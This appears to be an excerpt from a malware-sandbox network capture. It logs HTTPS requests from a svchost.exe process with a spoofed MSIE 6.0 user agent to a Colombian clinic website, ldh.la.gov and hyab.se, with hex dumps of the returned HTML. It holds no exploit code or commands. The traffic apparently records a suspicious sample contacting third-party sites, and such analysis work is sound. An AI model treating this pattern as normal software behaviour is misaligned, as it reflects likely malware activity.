                                                                                                                                                                              2023-09-15 05:27:25 UTC188INData Raw: 65 20 44 72 2e 20 4a 75 61 6e 20 4d 61 6e 75 65 6c 20 41 66 72 69 63 61 6e 6f 20 4c 65 c3 b3 6e 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 35 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 36 30 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: e Dr. Juan Manuel Africano Len" loading="lazy" width="514" height="600" class="img-fluid">
                                                                                                                                                                              2023-09-15 05:27:25 UTC192INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 72 2e 20 48 75 67 6f 20 46 65 72 72 65 69 72 61 20 54 72 61 73 6c 61 76 69 c3 b1 61 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 35 3e 20 3c 73 70 61 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 70 71 2d 74 65 61 6d 2d 64 65 73 69 67 6e 61 74 69 6f 6e 22
                                                                                                                                                                              Data Ascii: <p class="mb-0"> Dr. Hugo Ferreira Traslavia </p> </h5> <span class="pq-team-designation"
                                                                                                                                                                              2023-09-15 05:27:25 UTC195INData Raw: 62 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 74 65 61 6d 2d 69 6e 66 6f 22 3e 0d 0a
                                                                                                                                                                              Data Ascii: b0 </ul> </div> </div> <div class="pq-team-info">
                                                                                                                                                                              2023-09-15 05:27:25 UTC195INData Raw: 37 66 66 61 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c 61 73 73 3d 22 70 71 2d 6d 65 6d 62 65 72 2d 6e 61 6d 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 72 2e 20 4a 75 61 6e 20 4d 61 6e 75 65 6c 20 52 65 79 20 52 6f 6d c3 a1 6e 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68
                                                                                                                                                                              Data Ascii: 7ffa <h5 class="pq-member-name"> <p class="mb-0"> Dr. Juan Manuel Rey Romn </p> </h
                                                                                                                                                                              2023-09-15 05:27:25 UTC199INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 70 71 2d 63 6f 75 6e 74 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 4e 61 63 69 6d 69 65 6e 74 6f 73 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                                                                                                                                              Data Ascii: </div> <p class="pq-counter-description">Nacimientos</p> </div> </div> </div> </
                                                                                                                                                                              2023-09-15 05:27:25 UTC203INData Raw: 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6d 6f 64 61 6c 5f 74 65 73 74 69 6d 6f 6e 79 2d 31 22 3e 46 61 6d 69 6c 69 61 72 20 64 65 20 70 61 63 69 65 6e 74 65 3a 20 59 65 62 65 6c 79 73 20 56 61 72 67 61 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 35 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 63 6f 6e 6f 63 69 6d 69 65 6e 74 6f 3a 20 4c 75 69 73 20 46 72 65 64 64 79 20 4d 69 72
                                                                                                                                                                              Data Ascii: data-bs-target="#modal_testimony-1">Familiar de paciente: Yebelys Vargas </h5> </a> <span>Reconocimiento: Luis Freddy Mir
                                                                                                                                                                              2023-09-15 05:27:25 UTC207INData Raw: 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 21 2d 2d 20 4d 6f 64 61 6c 20 2d 2d 3e 0a 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 20 66 61 64 65 22 20 69 64 3d 22 6d 6f 64 61 6c 5f 74 65 73 74 69 6d 6f 6e 79 2d 31 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 22 65 78 61 6d 70 6c 65 4d 6f 64 61 6c 4c 61 62 65 6c 22 0a 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d
                                                                                                                                                                              Data Ascii: /button> </div> </div> </div> </div> ... Modal --> <div class="modal fade" id="modal_testimony-1" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true"> <div class="m
                                                                                                                                                                              2023-09-15 05:27:25 UTC212INData Raw: 75 6c 6f 20 6d c3 a1 73 20 70 6f 64 65 72 6f 73 6f 20 65 6e 74 72 65 20 6d 61 64 72 65 20 65 20 68 69 6a 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 39 30 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 35 31 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: ulo ms poderoso entre madre e hijo" width="903" height="516" loading="lazy" class="img-fluid">
                                                                                                                                                                              2023-09-15 05:27:25 UTC216INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 2f 62 6c 6f 67 2f 62 65 6e 65 66 69 63 69 6f 73 2d 64 65 6c 2d 6d 65 74 6f 64 6f 2d 63 61 6e 67 75 72 6f 22 3e 42 65 6e 65 66 69 63 69 6f 73 20 64 65 6c 20 6d c3 a9 74 6f 64 6f 20 63 61 6e 67 75 72 6f 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 35 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 62 6c 6f 67 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: href="publicaciones/blog/beneficios-del-metodo-canguro">Beneficios del mtodo canguro</a> </h5> <div class="pq-blog-info">
                                                                                                                                                                              2023-09-15 05:27:25 UTC220INData Raw: 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 20 3c 21 2d 2d 53 65 63 74 69 6f 6e 20 62 6c 6f 67 20 45 6e 64 2d 2d 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 20 20 20 20 46 6f 6f 74 65 72 20 73 74 61 72 74 0a 20 20 20 20 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 2d 2d 3e 0a 0a 3c 66 6f 6f 74 65 72 20 69 64 3d 22 70 71 2d 66 6f 6f 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 66 6f 6f 74 65 72 2d 73 74 79 6c 65 2d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 73 75 62 73 63 72 69 62 65 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20
                                                                                                                                                                              Data Ascii: div> </section> ...Section blog End--> ... ========================= Footer start ============================== --><footer id="pq-footer"> <div class="pq-footer-style-1"> <div class="pq-subscribe align-items-center">
                                                                                                                                                                              2023-09-15 05:27:25 UTC224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 65 72 76 69 63 69 6f 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: Servicios </a> </li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC227INData Raw: 37 31 36 64 0d 0a 20 32 30 32 33 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 36 3e 3c 61 20 68 72 65 66 3d 22 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 2f 62 6c 6f 67 2f 6c 61 63 74 61 6e 63 69 61 2d 6d 61 74 65 72 6e 61 2d 65 6c 2d 76 69 6e 63 75 6c 6f 2d 6d 61 73 2d 70 6f 64 65 72 6f 73 6f 2d 65 6e 74 72 65 2d 6d 61 64 72 65 2d 65 2d 68 69 6a 6f 22 3e 4c 61 63 74 61 6e 63 69 61 20 6d 61 74 65 72 6e 61 2c 20 65 6c 20 76 c3 ad 6e 63 75 6c 6f 20 6d c3 a1 73 20 70 6f 64 65 72 6f 73 6f 20 65 6e 74 72 65 20 6d 61 64 72 65 20 65 20 68 69 6a 6f 3c 2f 61 3e 3c 2f 68 36 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: 716d 2023</p> <h6><a href="publicaciones/blog/lactancia-materna-el-vinculo-mas-poderoso-entre-madre-e-hijo">Lactancia materna, el vnculo ms poderoso entre madre e hijo</a></h6>
                                                                                                                                                                              2023-09-15 05:27:25 UTC228INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 66 6f 6f 74 65 72 2d 72 65 63 65 6e 74 2d 70 6f 73 74 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 70 71 2d 70 6f 73 74 2d 64 61 74 65 20 6d 62 2d 30 22 3e 20 3c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: </a> </div>--> <div class="pq-footer-recent-post-info"> <p class="pq-post-date mb-0"> <i
                                                                                                                                                                              2023-09-15 05:27:25 UTC243INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 43 6c 69 6e 69 63 61 53 61 6e 4c 75 69 73 42 75 63 61 72 61 6d 61 6e 67 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 69 74 6c 65 3d 22 46 61 63 65 62 6f 6f 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <li> <a target="_blank" href="https://www.facebook.com/ClinicaSanLuisBucaramanga" title="Facebook">
                                                                                                                                                                              2023-09-15 05:27:25 UTC247INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 6d 6f 64 61 6c 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 63 73 5f 70 6f 70 75 70 5f 70 65 72 73 6f 6e 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 63 73 5f 70 6f 70 75 70 5f 70 65 72 73 6f 6e 22 20 64 61 74 61 2d 6e 75 6d 62 65 72 3d 22 2b 35 37 20 33 31 34 20 34 33 30 20 36 32 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 76 61 69 6c 61 62 69 6c 69 74 79 3d 27 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: ... modal body content --> <div class="wcs_popup_person_container"> <div class="wcs_popup_person" data-number="+57 314 430 6212" data-availability='{
                                                                                                                                                                              2023-09-15 05:27:25 UTC252INData Raw: 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 63 73 5f 70 6f 70 75 70 5f 70 65 72 73 6f 6e 5f 6e 61 6d 65 22 3e 43 69 74 61 73 20 6d 65 64 69 63 69 6e 61 20 70 61 72 74 69 63 75 6c 61 72 20 79 20 70 72 65 70 61 67 61 64 61 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 63 73 5f 70 6f 70 75 70 5f 70 65 72 73 6f 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 41 67 65 6e 64 61 6d 69 65 6e 74 6f 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 63 73 5f 70 6f 70 75 70
                                                                                                                                                                              Data Ascii: content"> <div class="wcs_popup_person_name">Citas medicina particular y prepagada</div> <div class="wcs_popup_person_description">Agendamiento</div> <div class="wcs_popup
                                                                                                                                                                              2023-09-15 05:27:25 UTC256INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3a 20 22 50 4f 53 54 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 72 6c 3a 20 22 6d 61 69 6c 2e 70 68 70 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 65 6d 61 69 6c 27 3a 20 65 6d 61 69 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 75 63 63 65 73 73 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: { type: "POST", url: "mail.php", data: { 'email': email }, success: function() { jQuery(
                                                                                                                                                                              2023-09-15 05:27:25 UTC260INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2a 2f 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 75 62 73 63 72 69 62 65 20 3d 20 24 28 27 5b 69 64 5e 3d 22 6e 65 77 73 6c 65 74 74 65 72 22 5d 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 6e 70 75 74 4e 65 77 73 6c 65 74 74 65 72 20 3d 20 24 28 27 23 65 6d 61 69 6c 2d 6e 65 77 73 6c 65 74 74 65 72 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 75 62 73 63 72 69 62 65 2e 61 70 70 65 6e 64 28 27 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                              Data Ascii: */ /* ---------------------------------------------------- */ var subscribe = $('[id^="newsletter"]'); var inputNewsletter = $('#email-newsletter'); subscribe.append('<div clas
                                                                                                                                                                              2023-09-15 05:27:25 UTC264INData Raw: 6d 20 74 68 65 20 75 73 65 72 20 62 72 6f 77 73 65 72 20 69 66 20 6e 6f 74 20 79 6f 75 20 63 61 6e 20 61 73 73 69 67 6e 20 69 74 20 77 69 74 68 20 50 48 50 20 6d 61 79 62 65 20 28 77 68 69 63 68 20 77 69 6c 6c 20 62 65 20 74 68 65 20 64 61 74 65 20 6f 66 20 74 68 65 20 73 65 72 76 65 72 29 20 66 6f 72 6d 61 74 3a 20 59 59 59 59 2d 4d 4d 2d 44 44 20 48 48 3a 6d 6d 3a 73 73 20 28 32 30 31 39 2d 31 32 2d 33 30 20 31 38 3a 33 30 3a 30 30 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 69 6d 65 7a 6f 6e 65 3a 20 27 41 6d 65 72 69 63 61 2f 42 6f 67 6f 74 61 27 2c 20 2f 2f 20 57 68 65 6e 20 75 73 69 6e 67 20 74 68 65 20 64 61 74 65 20 61 6e 64 20 74 69 6d 65 20 66 72 6f 6d 20 74 68 65 20 75 73 65 72 20 62 72 6f 77 73 65 72 20 79 6f 75 20 63
                                                                                                                                                                              Data Ascii: m the user browser if not you can assign it with PHP maybe (which will be the date of the server) format: YYYY-MM-DD HH:mm:ss (2019-12-30 18:30:00) timezone: 'America/Bogota', // When using the date and time from the user browser you c
                                                                                                                                                                              2023-09-15 05:27:25 UTC267INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              7192.168.2.35024275.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:23 UTC54OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: ldh.la.gov
                                                                                                                                                                              2023-09-15 05:27:23 UTC55INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:23 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 1346
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Server: Microsoft-IIS/10.0
                                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                                              2023-09-15 05:27:23 UTC55INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              8192.168.2.350251104.21.52.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:24 UTC56OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: hyab.se
                                                                                                                                                                              2023-09-15 05:27:24 UTC57INHTTP/1.1 403 Forbidden
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:24 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 5702
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                              Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                              Origin-Agent-Cluster: ?1
                                                                                                                                                                              Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              cf-mitigated: challenge
                                                                                                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3vQV2Rl%2F3jF7zpynd%2FdJKXFSgbRNyDCsmnjMwTSYdyGm1%2Bxf4mTO8pE8qtXVDGgiZOip%2BkL6oIQaHY4x6bT2l6RWbYLgbxGqkDIlPuAKTsNTpLPaS4WFAayK"}],"group":"cf-nel","max_age":604800}
